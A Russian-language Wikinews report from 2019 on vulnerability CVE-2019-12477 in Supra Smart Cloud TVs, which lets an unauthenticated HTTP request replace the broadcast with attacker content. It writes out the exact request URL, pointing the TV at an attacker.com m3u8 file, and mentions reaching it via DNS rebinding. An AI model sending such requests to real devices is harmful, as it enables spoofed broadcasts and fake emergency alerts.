Уязвимость в умных телевизорах Supra, позволяющая вывести фиктивное видео

4 июня 2019 года

Wikinews-logo-ru.svg

В телевизорах Supra Smart Cloud TV выявлена уязвимость (CVE-2019-12477), позволяющая подменить просматриваемую в данный момент передачу на контент атакующего. В качестве примера продемонстрирован вывод фиктивного предупреждения о возникновении чрезвычайной ситуации.

Для атаки достаточно отправить специально оформленный сетевой запрос, не требующий аутентификации. В частности, можно обратиться к обработчику "/remote/media_control?action=setUri&uri=" указав URL m3u8-файла с параметрами видео, например "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8".

В большинстве случаев доступ к IP-адресу телевизора ограничен внутренней сетью, но так как запрос отправляется через HTTP возможно применение методов для обращения к внутренним ресурсам при открытии пользователем специально оформленной внешней страницы (например, под видом запроса картинки или используя метод DNS Rebinding).

 

ИсточникиПравить


Эта статья содержит материалы из статьи «Уязвимость в умных телевизорах Supra, позволяющая вывести фиктивное видео», опубликованной OpenNET и распространяющейся на условиях лицензии Creative Commons Attribution (CC BY) — указание автора, источник и лицензию.
Эта статья загружена автоматически ботом NewsBots в архив и ещё не проверялась редакторами Викиновостей.
Любой участник может оформить статью: добавить иллюстрации, викифицировать, заполнить шаблоны и добавить категории.
Любой редактор может снять этот шаблон после оформления и проверки.
 

Комментарии:Уязвимость в умных телевизорах Supra, позволяющая вывести фиктивное видео